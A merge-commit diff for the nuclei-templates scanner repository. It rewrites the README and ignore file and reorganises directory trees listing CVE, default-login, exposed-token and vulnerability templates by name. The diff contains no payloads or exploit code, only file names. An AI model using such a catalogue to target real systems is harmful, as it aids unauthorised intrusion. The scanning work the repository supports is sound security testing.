Merge pull request #7 from projectdiscovery/master

Updation

.github/scripts/README.tmpl

@@ -9,23 +9,35 @@ f"""
 
 Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/nuclei) which power the actual scanning engine. This repository stores and houses various templates for the scanner provided by our team as well as contributed by the community. We hope that you also contribute by sending templates via **pull requests** or [Github issue](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+) and grow the list.
 
-An overview of the nuclei template directory including number of templates and HTTP request associated with each directory. 
+# Resources
 
-### Nuclei templates `{version}` overview
+- [Templates](#nuclei-templates-overview)
+- [Documentation](#-documentation)
+- [Contributions](#-contributions)
+- [Discussion](#-discussion)
+- [Community](#-community)
+- [Notes](#-notes)
 
-| Templates          | Counts                           | Templates                 | Counts                                  |
-| ------------------ | -------------------------------- | ------------------------- | --------------------------------------- |
-| cves               | {countTpl("cves/*")}             | files                     | {countTpl("files")}                     |
-| vulnerabilities    | {countTpl("vulnerabilities")}    | panels                    | {countTpl("panels")}                    |
-| technologies       | {countTpl("technologies")}       | security-misconfiguration | {countTpl("security-misconfiguration")} |
-| workflows          | {countTpl("workflows")}          | tokens                    | {countTpl("tokens")}                    |
-| dns                | {countTpl("dns")}                | fuzzing                   | {countTpl("fuzzing")}                   |
-| generic-detections | {countTpl("generic-detections")} | default-credentials       | {countTpl("default-credentials")}       |
-| subdomain-takeover | {countTpl("subdomain-takeover")} | payloads                  | {countTpl("payloads")}                  |
-| wordlists          | {countTpl("wordlists")}          | misc                      | {countTpl("misc")}                      |
+### Nuclei templates overview
+-----
+
+An overview of the nuclei template directory including number of templates associated with each directory. 
 
 
-### Nuclei templates `{version}` tree overview
+**Directory structure of nuclei templates:**
+
+| Templates       | Counts                          | Templates        | Counts                         |
+| --------------- | ------------------------------- | ---------------- | ------------------------------ |
+| cves            | {countTpl("cves/*")}            | default-logins   | {countTpl("default-logins/*")} |
+| dns             | {countTpl("dns")}               | exposed-panels   | {countTpl("exposed-panels")}   |
+| exposed-tokens  | {countTpl("exposed-tokens/*")}  | exposures        | {countTpl("exposures/*")}      |
+| fuzzing         | {countTpl("fuzzing")}           | helpers          | {countTpl("helpers/*")}        |
+| miscellaneous   | {countTpl("miscellaneous")}     | misconfiguration | {countTpl("misconfiguration")} |
+| takeovers       | {countTpl("takeovers")}         | technologies     | {countTpl("technologies")}     |
+| vulnerabilities | {countTpl("vulnerabilities/*")} | workflows        | {countTpl("workflows")}        |
+
+
+**Tree structure of nuclei templates:**
 
 <details>
 <summary> Nuclei templates </summary>
@@ -38,12 +50,30 @@ An overview of the nuclei template directory including number of templates and H
 
 **{command("tree", -2, None)}**.
 
-Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to build new and your own custom templates and many example templates for easy understanding. 
+📖 Documentation
+-----
+
+Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to **build** new and your **own custom** templates, we have also added many example templates for easy understanding.
+
+💪 Contributions
+-----
+
+Nuclei-templates is powered by major contributions from the community. [Template contributions ](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+), [Feature Requests](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=feature_request.md&title=%5BFeature%5D+) and [Bug Reports](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=bug_report.md&title=%5BBug%5D+) are more than welcome.
+
+💬 Discussion
+-----
+
+Have questions / doubts / ideas to discuss? feel free to open a discussion using [Github discussions](https://github.com/projectdiscovery/nuclei-templates/discussions) board.
+
+👨‍💻 Community
+-----
+
+You are welcomed to join our [Discord Community](https://discord.gg/KECAGdH). You can also follow us on [Twitter](https://twitter.com/pdiscoveryio) to keep up with everything related to projectdiscovery.
+
+💡 Notes
+-----
+-  Use YAMLlint (e.g. [yamllint](http://www.yamllint.com/) to validate the syntax of templates before sending pull requests.
 
-------
-**Notes:** 
-1. Use YAMLlint (e.g. [yamllint](http://www.yamllint.com/)) to validate new templates when sending pull requests.
-2. Use YAML Formatter (e.g. [jsonformatter](https://jsonformatter.org/yaml-formatter)) to format new templates when sending pull requests.
 
 Thanks again for your contribution and keeping the community vibrant. :heart:
 """

.nuclei-ignore

@@ -12,18 +12,17 @@
 # More details - https://github.com/projectdiscovery/nuclei#using-nuclei-ignore-file-for-template-exclusion
 
 .pre-commit-config.yaml
-cves/CVE-2017-7529.yaml
-cves/CVE-2020-13379.yaml
-cves/CVE-2013-2251.yaml
-cves/CVE-2020-16139.yaml
-vulnerabilities/x-forwarded-host-injection.yaml
+cves/2013/CVE-2013-2251.yaml
+cves/2017/CVE-2017-7529.yaml	
+cves/2020/CVE-2020-13379.yaml	
+cves/2020/CVE-2020-16139.yaml
 
 # Fuzzing is excluded to avoid running bruteforce on every server as default.
 fuzzing/
 
 # Wordlist directory contains payload to be used with templates. 
-wordlists/
-misc/
+helpers/
+miscellaneous/
 
 # Workflows are excluded from default run to avoid duplicate scans.
 workflows/

README.md

@@ -9,23 +9,35 @@
 
 Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/nuclei) which power the actual scanning engine. This repository stores and houses various templates for the scanner provided by our team as well as contributed by the community. We hope that you also contribute by sending templates via **pull requests** or [Github issue](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+) and grow the list.
 
-An overview of the nuclei template directory including number of templates and HTTP request associated with each directory. 
+# Resources
 
-### Nuclei templates `v7.3.6` overview
+- [Templates](#nuclei-templates-overview)
+- [Documentation](#-documentation)
+- [Contributions](#-contributions)
+- [Discussion](#-discussion)
+- [Community](#-community)
+- [Notes](#-notes)
 
-| Templates          | Counts                           | Templates                 | Counts                                  |
-| ------------------ | -------------------------------- | ------------------------- | --------------------------------------- |
-| cves               | 146             | files                     | 48                     |
-| vulnerabilities    | 42    | panels                    | 49                    |
-| technologies       | 41       | security-misconfiguration | 29 |
-| workflows          | 17          | tokens                    | 8                    |
-| dns                | 6                | fuzzing                   | 6                   |
-| generic-detections | 3 | default-credentials       | 4       |
-| subdomain-takeover | 2 | payloads                  | 2                  |
-| wordlists          | 1          | misc                      | 14                      |
+### Nuclei templates overview
+-----
+
+An overview of the nuclei template directory including number of templates associated with each directory. 
 
 
-### Nuclei templates `v7.3.6` tree overview
+**Directory structure of nuclei templates:**
+
+| Templates       | Counts                          | Templates        | Counts                         |
+| --------------- | ------------------------------- | ---------------- | ------------------------------ |
+| cves            | 154            | default-logins   | 8 |
+| dns             | 6               | exposed-panels   | 73   |
+| exposed-tokens  | 9  | exposures        | 40      |
+| fuzzing         | 5           | helpers          | 3        |
+| miscellaneous   | 14     | misconfiguration | 37 |
+| takeovers       | 1         | technologies     | 44     |
+| vulnerabilities | 66 | workflows        | 17        |
+
+
+**Tree structure of nuclei templates:**
 
 <details>
 <summary> Nuclei templates </summary>
@@ -75,8 +87,11 @@ An overview of the nuclei template directory including number of templates and H
 │   │   ├── CVE-2018-3714.yaml
 │   │   ├── CVE-2018-3760.yaml
 │   │   ├── CVE-2018-5230.yaml
-│   │   └── CVE-2018-7490.yaml
+│   │   ├── CVE-2018-7251.yaml
+│   │   ├── CVE-2018-7490.yaml
+│   │   └── CVE-2018-8006.yaml
 │   ├── 2019
+│   │   ├── CVE-2019-10092.yaml
 │   │   ├── CVE-2019-1010287.yaml
 │   │   ├── CVE-2019-10475.yaml
 │   │   ├── CVE-2019-11248.yaml
@@ -88,6 +103,7 @@ An overview of the nuclei template directory including number of templates and H
 │   │   ├── CVE-2019-12461.yaml
 │   │   ├── CVE-2019-12593.yaml
 │   │   ├── CVE-2019-12725.yaml
+│   │   ├── CVE-2019-14223.yaml
 │   │   ├── CVE-2019-14322.yaml
 │   │   ├── CVE-2019-14696.yaml
 │   │   ├── CVE-2019-14974.yaml
@@ -117,6 +133,7 @@ An overview of the nuclei template directory including number of templates and H
 │   │   ├── CVE-2019-6112.yaml
 │   │   ├── CVE-2019-6340.yaml
 │   │   ├── CVE-2019-6715.yaml
+│   │   ├── CVE-2019-7219.yaml
 │   │   ├── CVE-2019-7256.yaml
 │   │   ├── CVE-2019-7609.yaml
 │   │   ├── CVE-2019-8442.yaml
@@ -126,6 +143,7 @@ An overview of the nuclei template directory including number of templates and H
 │   │   ├── CVE-2019-8982.yaml
 │   │   ├── CVE-2019-9670.yaml
 │   │   ├── CVE-2019-9733.yaml
+│   │   ├── CVE-2019-9955.yaml
 │   │   └── CVE-2019-9978.yaml
 │   └── 2020
 │       ├── CVE-2020-0618.yaml
@@ -146,12 +164,13 @@ An overview of the nuclei template directory including number of templates and H
 │       ├── CVE-2020-15129.yaml
 │       ├── CVE-2020-15505.yaml
 │       ├── CVE-2020-15920.yaml
-│       ├── CVE-2020-16139.yaml
 │       ├── CVE-2020-16846.yaml
 │       ├── CVE-2020-16952.yaml
 │       ├── CVE-2020-17505.yaml
 │       ├── CVE-2020-17506.yaml
+│       ├── CVE-2020-17518.yaml
 │       ├── CVE-2020-17519.yaml
+│       ├── CVE-2020-1943.yaml
 │       ├── CVE-2020-2096.yaml
 │       ├── CVE-2020-2140.yaml
 │       ├── CVE-2020-23972.yaml
@@ -185,14 +204,27 @@ An overview of the nuclei template directory including number of templates and H
 │       ├── CVE-2020-8982.yaml
 │       ├── CVE-2020-9047.yaml
 │       ├── CVE-2020-9344.yaml
+│       ├── CVE-2020-9376.yaml
 │       ├── CVE-2020-9484.yaml
 │       ├── CVE-2020-9496.yaml
 │       └── CVE-2020-9757.yaml
-├── default-credentials
-│   ├── grafana-default-credential.yaml
-│   ├── rabbitmq-default-admin.yaml
-│   ├── solarwinds-default-admin.yaml
-│   └── tomcat-manager-default.yaml
+├── default-logins
+│   ├── activemq
+│   │   └── activemq-default-login.yaml
+│   ├── ambari
+│   │   └── ambari-default-credentials.yaml
+│   ├── apache
+│   │   └── tomcat-manager-default.yaml
+│   ├── grafana
+│   │   └── grafana-default-credential.yaml
+│   ├── ofbiz
+│   │   └── ofbiz-default-credentials.yaml
+│   ├── rabbitmq
+│   │   └── rabbitmq-default-admin.yaml
+│   ├── solarwinds
+│   │   └── solarwinds-default-admin.yaml
+│   └── zabbix
+│       └── zabbix-default-credentials.yaml
 ├── dns
 │   ├── azure-takeover-detection.yaml
 │   ├── cname-service-detector.yaml
@@ -200,67 +232,154 @@ An overview of the nuclei template directory including number of templates and H
 │   ├── mx-service-detector.yaml
 │   ├── servfail-refused-hosts.yaml
 │   └── spoofable-spf-records-ptr.yaml
-├── files
-│   ├── apc-info.yaml
-│   ├── cgi-test-page.yaml
-│   ├── composer-config.yaml
-│   ├── docker-registry.yaml
-│   ├── domcfg-page.yaml
-│   ├── druid-monitor.yaml
-│   ├── drupal-install.yaml
-│   ├── ds_store.yaml
-│   ├── elasticsearch.yaml
-│   ├── elmah-log-file.yaml
-│   ├── error-logs.yaml
-│   ├── exposed-kibana.yaml
-│   ├── exposed-svn.yaml
-│   ├── filezilla.yaml
-│   ├── firebase-detect.yaml
-│   ├── git-config.yaml
-│   ├── graylog-api-browser.yaml
-│   ├── htpasswd-detection.yaml
-│   ├── jkstatus-manager.yaml
-│   ├── jolokia.yaml
-│   ├── laravel-env.yaml
-│   ├── lazy-file.yaml
-│   ├── magento-config.yaml
-│   ├── owncloud-config.yaml
-│   ├── package-json.yaml
-│   ├── php-errors.yaml
-│   ├── phpinfo.yaml
-│   ├── public-tomcat-instance.yaml
-│   ├── redmine-db-config.yaml
-│   ├── server-private-keys.yaml
-│   ├── server-status-localhost.yaml
-│   ├── shell-history.yaml
-│   ├── sql-dump.yaml
-│   ├── telerik-dialoghandler-detect.yaml
-│   ├── telerik-fileupload-detect.yaml
-│   ├── tomcat-scripts.yaml
-│   ├── wadl-files.yaml
-│   ├── web-config.yaml
-│   ├── wordpress-db-backup.yaml
-│   ├── wordpress-debug-log.yaml
-│   ├── wordpress-directory-listing.yaml
-│   ├── wordpress-emergency-script.yaml
-│   ├── wordpress-installer-log.yaml
-│   ├── wordpress-tmm-db-migrate.yaml
-│   ├── wordpress-user-enumeration.yaml
-│   ├── wsdl-detect.yaml
-│   ├── xprober-service.yaml
-│   └── zip-backup-files.yaml
+├── exposed-panels
+│   ├── active-admin-exposure.yaml
+│   ├── activemq-panel.yaml
+│   ├── adminer-panel.yaml
+│   ├── aims-password-mgmt-client.yaml
+│   ├── airflow-exposure.yaml
+│   ├── ambari-exposure.yaml
+│   ├── ansible-tower-exposure.yaml
+│   ├── atlassian-crowd-panel.yaml
+│   ├── cisco-asa-panel.yaml
+│   ├── citrix-adc-gateway-detect.yaml
+│   ├── citrix-vpn-detect.yaml
+│   ├── compal-panel.yaml
+│   ├── couchdb-exposure.yaml
+│   ├── couchdb-fauxton.yaml
+│   ├── crxde.yaml
+│   ├── django-admin-panel.yaml
+│   ├── druid-console-exposure.yaml
+│   ├── exposed-pagespeed-global-admin.yaml
+│   ├── exposed-webalizer.yaml
+│   ├── flink-exposure.yaml
+│   ├── fortinet-fortigate-panel.yaml
+│   ├── fortiweb-panel.yaml
+│   ├── github-enterprise-detect.yaml
+│   ├── gitlab-detect.yaml
+│   ├── globalprotect-panel.yaml
+│   ├── go-anywhere-client.yaml
+│   ├── grafana-detect.yaml
+│   ├── hadoop-exposure.yaml
+│   ├── identityguard-selfservice-entrust.yaml
+│   ├── iomega-lenovo-emc-shared-nas-detect.yaml
+│   ├── jira-detect.yaml
+│   ├── jmx-console.yaml
+│   ├── kafka-connect-ui.yaml
+│   ├── kafka-monitoring.yaml
+│   ├── kafka-topics-ui.yaml
+│   ├── kubernetes-dashboard.yaml
+│   ├── manage-engine-admanager-panel.yaml
+│   ├── mobileiron-login.yaml
+│   ├── netscaler-gateway.yaml
+│   ├── network-camera-detect.yaml
+│   ├── oipm-detect.yaml
+│   ├── parallels-html-client.yaml
+│   ├── phpmyadmin-panel.yaml
+│   ├── polycom-admin-detect.yaml
+│   ├── prometheus-exporter-detect.yaml
+│   ├── public-tomcat-manager.yaml
+│   ├── pulse-secure-panel.yaml
+│   ├── rabbitmq-dashboard.yaml
+│   ├── rocketmq-console-exposure.yaml
+│   ├── rsa-self-service.yaml
+│   ├── sap-hana-xsengine-panel.yaml
+│   ├── sap-netweaver-detect.yaml
+│   ├── sap-recon-detect.yaml
+│   ├── selenoid-ui-exposure.yaml
+│   ├── setup-page-exposure.yaml
+│   ├── solarwinds-orion.yaml
+│   ├── solr-exposure.yaml
+│   ├── sonarqube-login.yaml
+│   ├── sonicwall-management-panel.yaml
+│   ├── sonicwall-sslvpn-panel.yaml
+│   ├── sophos-fw-version-detect.yaml
+│   ├── supervpn-panel.yaml
+│   ├── tikiwiki-cms.yaml
+│   ├── tomcat-manager-pathnormalization.yaml
+│   ├── traefik-dashboard.yaml
+│   ├── virtual-ema-detect.yaml
+│   ├── weave-scope-dashboard-detect.yaml
+│   ├── webeditors.yaml
+│   ├── webmin-panel.yaml
+│   ├── workspace-one-uem.yaml
+│   ├── workspaceone-uem-airwatch-dashboard-detect.yaml
+│   ├── yarn-manager-exposure.yaml
+│   └── zipkin-exposure.yaml
+├── exposed-tokens
+│   ├── aws
+│   │   ├── amazon-mws-auth-token-value.yaml
+│   │   └── aws-access-key-value.yaml
+│   ├── generic
+│   │   ├── credentials-disclosure.yaml
+│   │   ├── general-tokens.yaml
+│   │   └── http-username-password.yaml
+│   ├── google
+│   │   ├── fcm-server-key.yaml
+│   │   └── google-api-key.yaml
+│   ├── mailchimp
+│   │   └── mailchimp-api-key.yaml
+│   └── slack
+│       └── slack-access-token.yaml
+├── exposures
+│   ├── apis
+│   │   ├── swagger-api.yaml
+│   │   ├── wadl-api.yaml
+│   │   └── wsdl-api.yaml
+│   ├── backups
+│   │   ├── sql-dump.yaml
+│   │   └── zip-backup-files.yaml
+│   ├── configs
+│   │   ├── airflow-configuration-exposure.yaml
+│   │   ├── amazon-docker-config-disclosure.yaml
+│   │   ├── ansible-config-disclosure.yaml
+│   │   ├── composer-config.yaml
+│   │   ├── exposed-svn.yaml
+│   │   ├── git-config-nginxoffbyslash.yaml
+│   │   ├── git-config.yaml
+│   │   ├── htpasswd-detection.yaml
+│   │   ├── laravel-env.yaml
+│   │   ├── magento-config.yaml
+│   │   ├── opcache-status-exposure.yaml
+│   │   ├── owncloud-config.yaml
+│   │   ├── package-json.yaml
+│   │   ├── perl-status.yaml
+│   │   ├── phpinfo.yaml
+│   │   ├── rails-database-config.yaml
+│   │   ├── redmine-db-config.yaml
+│   │   ├── server-status-localhost.yaml
+│   │   ├── syfmony-profiler.yaml
+│   │   ├── symfony-database-config.yaml
+│   │   ├── symfony-profiler.yaml
+│   │   └── web-config.yaml
+│   ├── files
+│   │   ├── domcfg-page.yaml
+│   │   ├── drupal-install.yaml
+│   │   ├── ds_store.yaml
+│   │   ├── exposed-alps-spring.yaml
+│   │   ├── filezilla.yaml
+│   │   ├── lazy-file.yaml
+│   │   ├── server-private-keys.yaml
+│   │   └── xprober-service.yaml
+│   └── logs
+│       ├── elmah-log-file.yaml
+│       ├── error-logs.yaml
+│       ├── rails-debug-mode.yaml
+│       ├── struts-debug-mode.yaml
+│       └── trace-axd-detect.yaml
 ├── fuzzing
 │   ├── arbitrary-file-read.yaml
-│   ├── basic-auth-bruteforce.yaml
 │   ├── directory-traversal.yaml
 │   ├── generic-lfi-fuzzing.yaml
 │   ├── iis-shortname.yaml
 │   └── wp-plugin-scan.yaml
-├── generic-detections
-│   ├── basic-xss-prober.yaml
-│   ├── general-tokens.yaml
-│   └── top-15-xss.yaml
-├── misc
+├── helpers
+│   ├── payloads
+│   │   ├── CVE-2020-5776.csv
+│   │   └── CVE-2020-6287.xml
+│   └── wordlists
+│       └── wp-plugins.txt
+├── miscellaneous
 │   ├── basic-cors-flash.yaml
 │   ├── dir-listing.yaml
 │   ├── htaccess-config.yaml
@@ -275,92 +394,46 @@ An overview of the nuclei template directory including number of templates and H
 │   ├── unencrypted-bigip-ltm-cookie.yaml
 │   ├── wp-xmlrpc.yaml
 │   └── xml-schema-detect.yaml
-├── panels
-│   ├── adminer-panel.yaml
-│   ├── aims-password-mgmt-client.yaml
-│   ├── atlassian-crowd-panel.yaml
-│   ├── cisco-asa-panel.yaml
-│   ├── citrix-adc-gateway-detect.yaml
-│   ├── citrix-vpn-detect.yaml
-│   ├── compal.yaml
-│   ├── crxde.yaml
-│   ├── docker-api.yaml
-│   ├── fortinet-fortigate-panel.yaml
-│   ├── github-enterprise-detect.yaml
-│   ├── gitlab-detect.yaml
-│   ├── globalprotect-panel.yaml
-│   ├── go-anywhere-client.yaml
-│   ├── grafana-detect.yaml
-│   ├── identityguard-selfservice-entrust.yaml
-│   ├── iomega-lenovo-emc-shared-nas-detect.yaml
-│   ├── jenkins-asyncpeople.yaml
-│   ├── jmx-console.yaml
-│   ├── kubernetes-pods.yaml
-│   ├── manage-engine-admanager-panel.yaml
-│   ├── mobileiron-login.yaml
-│   ├── netscaler-gateway.yaml
-│   ├── network-camera-detect.yaml
-│   ├── oipm-detect.yaml
-│   ├── parallels-html-client.yaml
-│   ├── phpmyadmin-panel.yaml
-│   ├── polycom-admin-detect.yaml
-│   ├── pulse-secure-panel.yaml
-│   ├── rabbitmq-dashboard.yaml
-│   ├── rsa-self-service.yaml
-│   ├── sap-hana-xsengine-panel.yaml
-│   ├── sap-netweaver-detect.yaml
-│   ├── sap-recon-detect.yaml
-│   ├── solarwinds-orion.yaml
-│   ├── sonarqube-login.yaml
-│   ├── sonicwall-management-panel.yaml
-│   ├── sonicwall-sslvpn-panel.yaml
-│   ├── sophos-fw-version-detect.yaml
-│   ├── supervpn-panel.yaml
-│   ├── swagger-panel.yaml
-│   ├── tikiwiki-cms.yaml
-│   ├── traefik-dashboard.yaml
-│   ├── virtual-ema-detect.yaml
-│   ├── weave-scope-dashboard-detect.yaml
-│   ├── webeditors.yaml
-│   ├── webmin-panel.yaml
-│   ├── workspace-one-uem.yaml
-│   └── workspaceone-uem-airwatch-dashboard-detect.yaml
-├── payloads
-│   ├── CVE-2020-5776.csv
-│   └── CVE-2020-6287.xml
-├── security-misconfiguration
+├── misconfiguration
 │   ├── aem-groovyconsole.yaml
+│   ├── airflow-api-exposure.yaml
 │   ├── apache-tomcat-snoop.yaml
+│   ├── apc-info.yaml
 │   ├── aspx-debug-mode.yaml
-│   ├── basic-cors.yaml
+│   ├── aws-redirect.yaml
+│   ├── cgi-test-page.yaml
 │   ├── django-debug-detect.yaml
+│   ├── docker-api.yaml
+│   ├── docker-registry.yaml
+│   ├── druid-monitor.yaml
 │   ├── drupal-user-enum-ajax.yaml
 │   ├── drupal-user-enum-redirect.yaml
+│   ├── elasticsearch.yaml
+│   ├── exposed-kibana.yaml
 │   ├── exposed-service-now.yaml
 │   ├── front-page-misconfig.yaml
-│   ├── jenkins-stack-trace.yaml
-│   ├── jira-service-desk-signup.yaml
-│   ├── jira-unauthenticated-dashboards.yaml
-│   ├── jira-unauthenticated-popular-filters.yaml
-│   ├── jira-unauthenticated-projects.yaml
-│   ├── jira-unauthenticated-user-picker.yaml
+│   ├── hadoop-unauth.yaml
+│   ├── jkstatus-manager.yaml
 │   ├── jupyter-ipython-unauth.yaml
+│   ├── kubernetes-pods.yaml
 │   ├── larvel-debug.yaml
+│   ├── linkerd-ssrf-detect.yaml
 │   ├── manage-engine-ad-search.yaml
+│   ├── php-errors.yaml
 │   ├── put-method-enabled.yaml
 │   ├── rack-mini-profiler.yaml
 │   ├── salesforce-aura-misconfig.yaml
+│   ├── shell-history.yaml
 │   ├── sidekiq-dashboard.yaml
 │   ├── springboot-detect.yaml
+│   ├── symfony-debugmode.yaml
+│   ├── tomcat-scripts.yaml
 │   ├── unauthenticated-airflow.yaml
-│   ├── unauthenticated-jenkin-dashboard.yaml
 │   ├── unauthenticated-nacos-access.yaml
 │   ├── wamp-xdebug-detect.yaml
-│   ├── wordpress-accessible-wpconfig.yaml
 │   └── zenphoto-installation-sensitive-info.yaml
-├── subdomain-takeover
-│   ├── detect-all-takeovers.yaml
-│   └── s3-subtakeover.yaml
+├── takeovers
+│   └── subdomain-takeover.yaml
 ├── technologies
 │   ├── apache-detect.yaml
 │   ├── artica-web-proxy-detect.yaml
@@ -370,24 +443,25 @@ An overview of the nuclei template directory including number of templates and H
 │   ├── clockwork-php-page.yaml
 │   ├── couchdb-detect.yaml
 │   ├── favicon-detection.yaml
+│   ├── firebase-detect.yaml
 │   ├── google-storage.yaml
 │   ├── graphql.yaml
+│   ├── graylog-api-browser.yaml
 │   ├── home-assistant.yaml
 │   ├── jaspersoft-detect.yaml
-│   ├── jira-detect.yaml
+│   ├── jolokia.yaml
 │   ├── kibana-detect.yaml
 │   ├── kong-detect.yaml
 │   ├── liferay-portal-detect.yaml
 │   ├── linkerd-badrule-detect.yaml
-│   ├── linkerd-ssrf-detect.yaml
 │   ├── lotus-domino-version.yaml
+│   ├── lucee-detect.yaml
 │   ├── magmi-detect.yaml
 │   ├── mrtg-detect.yaml
 │   ├── netsweeper-webadmin-detect.yaml
 │   ├── nifi-detech.yaml
 │   ├── oidc-detect.yaml
 │   ├── pi-hole-detect.yaml
-│   ├── prometheus-exporter-detect.yaml
 │   ├── prometheus-exposed-panel.yaml
 │   ├── prtg-detect.yaml
 │   ├── redmine-cli-detect.yaml
@@ -397,69 +471,95 @@ An overview of the nuclei template directory including number of templates and H
 │   ├── shiro-detect.yaml
 │   ├── sql-server-reporting.yaml
 │   ├── tech-detect.yaml
+│   ├── telerik-dialoghandler-detect.yaml
+│   ├── telerik-fileupload-detect.yaml
 │   ├── terraform-detect.yaml
 │   ├── tomcat-detect.yaml
 │   ├── tor-socks-proxy.yaml
 │   ├── waf-detect.yaml
 │   ├── weblogic-detect.yaml
 │   └── werkzeug-debugger-detect.yaml
-├── tokens
-│   ├── amazon-mws-auth-token-value.yaml
-│   ├── aws-access-key-value.yaml
-│   ├── credentials-disclosure.yaml
-│   ├── fcm-server-key.yaml
-│   ├── google-api-key.yaml
-│   ├── http-username-password.yaml
-│   ├── mailchimp-api-key.yaml
-│   └── slack-access-token.yaml
 ├── vulnerabilities
-│   ├── bullwark-momentum-series-directory-traversal.yaml
-│   ├── cached-aem-pages.yaml
-│   ├── couchdb-adminparty.yaml
-│   ├── crlf-injection.yaml
-│   ├── discourse-xss.yaml
-│   ├── easy-wp-smtp-listing.yaml
-│   ├── eclipse-help-system-xss.yaml
-│   ├── git-config-nginxoffbyslash.yaml
-│   ├── ibm-infoprint-directory-traversal.yaml
-│   ├── mcafee-epo-rce.yaml
-│   ├── microstrategy-ssrf.yaml
-│   ├── mida-eframework-xss.yaml
-│   ├── moodle-filter-jmol-lfi.yaml
-│   ├── moodle-filter-jmol-xss.yaml
-│   ├── nginx-module-vts-xss.yaml
-│   ├── nuuo-nvrmini2-rce.yaml
-│   ├── open-redirect.yaml
-│   ├── oracle-ebs-bispgraph-file-access.yaml
-│   ├── pdf-signer-ssti-to-rce.yaml
-│   ├── rails6-xss.yaml
-│   ├── rce-shellshock-user-agent.yaml
-│   ├── rce-via-java-deserialization.yaml
-│   ├── rconfig-rce.yaml
-│   ├── sassy-social-share.yaml
-│   ├── sick-beard-xss.yaml
-│   ├── springboot-actuators-jolokia-xxe.yaml
-│   ├── springboot-h2-db-rce.yaml
-│   ├── symantec-messaging-gateway.yaml
-│   ├── symfony-debugmode.yaml
-│   ├── tikiwiki-reflected-xss.yaml
-│   ├── tomcat-manager-pathnormalization.yaml
-│   ├── twig-php-ssti.yaml
-│   ├── vmware-vcenter-lfi-linux.yaml
-│   ├── vmware-vcenter-lfi.yaml
-│   ├── vpms-auth-bypass.yaml
-│   ├── w3c-total-cache-ssrf.yaml
-│   ├── wems-manager-xss.yaml
-│   ├── wordpress-emails-verification-for-woocommerce.yaml
-│   ├── wordpress-social-metrics-tracker.yaml
-│   ├── wordpress-wordfence-xss.yaml
-│   ├── wordpress-wpcourses-info-disclosure.yaml
-│   └── zms-auth-bypass.yaml
-├── wordlists
-│   └── wp-plugins.txt
+│   ├── generic
+│   │   ├── basic-cors.yaml
+│   │   ├── basic-xss-prober.yaml
+│   │   ├── crlf-injection.yaml
+│   │   ├── top-xss-params.yaml
+│   │   └── url-redirect.yaml
+│   ├── ibm
+│   │   ├── eclipse-help-system-xss.yaml
+│   │   └── ibm-infoprint-directory-traversal.yaml
+│   ├── jenkins
+│   │   ├── jenkins-asyncpeople.yaml
+│   │   ├── jenkins-stack-trace.yaml
+│   │   └── unauthenticated-jenkin-dashboard.yaml
+│   ├── jira
+│   │   ├── jira-service-desk-signup.yaml
+│   │   ├── jira-unauthenticated-dashboards.yaml
+│   │   ├── jira-unauthenticated-popular-filters.yaml
+│   │   ├── jira-unauthenticated-projects.yaml
+│   │   └── jira-unauthenticated-user-picker.yaml
+│   ├── moodle
+│   │   ├── moodle-filter-jmol-lfi.yaml
+│   │   └── moodle-filter-jmol-xss.yaml
+│   ├── oracle
+│   │   └── oracle-ebs-bispgraph-file-access.yaml
+│   ├── other
+│   │   ├── acme-xss.yaml
+│   │   ├── aspnuke-openredirect.yaml
+│   │   ├── bullwark-momentum-series-directory-traversal.yaml
+│   │   ├── cached-aem-pages.yaml
+│   │   ├── couchdb-adminparty.yaml
+│   │   ├── discourse-xss.yaml
+│   │   ├── mcafee-epo-rce.yaml
+│   │   ├── microstrategy-ssrf.yaml
+│   │   ├── mida-eframework-xss.yaml
+│   │   ├── nginx-module-vts-xss.yaml
+│   │   ├── nuuo-nvrmini2-rce.yaml
+│   │   ├── pdf-signer-ssti-to-rce.yaml
+│   │   ├── rce-shellshock-user-agent.yaml
+│   │   ├── rce-via-java-deserialization.yaml
+│   │   ├── rconfig-rce.yaml
+│   │   ├── sick-beard-xss.yaml
+│   │   ├── symantec-messaging-gateway.yaml
+│   │   ├── thinkific-redirect.yaml
+│   │   ├── tikiwiki-reflected-xss.yaml
+│   │   ├── twig-php-ssti.yaml
+│   │   ├── vpms-auth-bypass.yaml
+│   │   ├── wems-manager-xss.yaml
+│   │   ├── yarn-resourcemanager-rce.yaml
+│   │   └── zms-auth-bypass.yaml
+│   ├── rails
+│   │   └── rails6-xss.yaml
+│   ├── springboot
+│   │   ├── springboot-actuators-jolokia-xxe.yaml
+│   │   └── springboot-h2-db-rce.yaml
+│   ├── thinkphp
+│   │   ├── thinkphp-2-rce.yaml
+│   │   ├── thinkphp-5022-rce.yaml
+│   │   ├── thinkphp-5023-rce.yaml
+│   │   └── thinkphp-509-information-disclosure.yaml
+│   ├── vmware
+│   │   ├── vmware-vcenter-lfi-linux.yaml
+│   │   └── vmware-vcenter-lfi.yaml
+│   └── wordpress
+│       ├── easy-wp-smtp-listing.yaml
+│       ├── sassy-social-share.yaml
+│       ├── w3c-total-cache-ssrf.yaml
+│       ├── wordpress-accessible-wpconfig.yaml
+│       ├── wordpress-db-backup.yaml
+│       ├── wordpress-debug-log.yaml
+│       ├── wordpress-directory-listing.yaml
+│       ├── wordpress-emails-verification-for-woocommerce.yaml
+│       ├── wordpress-emergency-script.yaml
+│       ├── wordpress-installer-log.yaml
+│       ├── wordpress-social-metrics-tracker.yaml
+│       ├── wordpress-tmm-db-migrate.yaml
+│       ├── wordpress-user-enumeration.yaml
+│       ├── wordpress-wordfence-xss.yaml
+│       └── wordpress-wpcourses-info-disclosure.yaml
 └── workflows
     ├── artica-web-proxy-workflow.yaml
-    ├── basic-auth-workflow.yaml
     ├── bigip-workflow.yaml
     ├── cisco-asa-workflow.yaml
     ├── grafana-workflow.yaml
@@ -473,19 +573,38 @@ An overview of the nuclei template directory including number of templates and H
     ├── sap-netweaver-workflow.yaml
     ├── solarwinds-orion-workflow.yaml
     ├── springboot-workflow.yaml
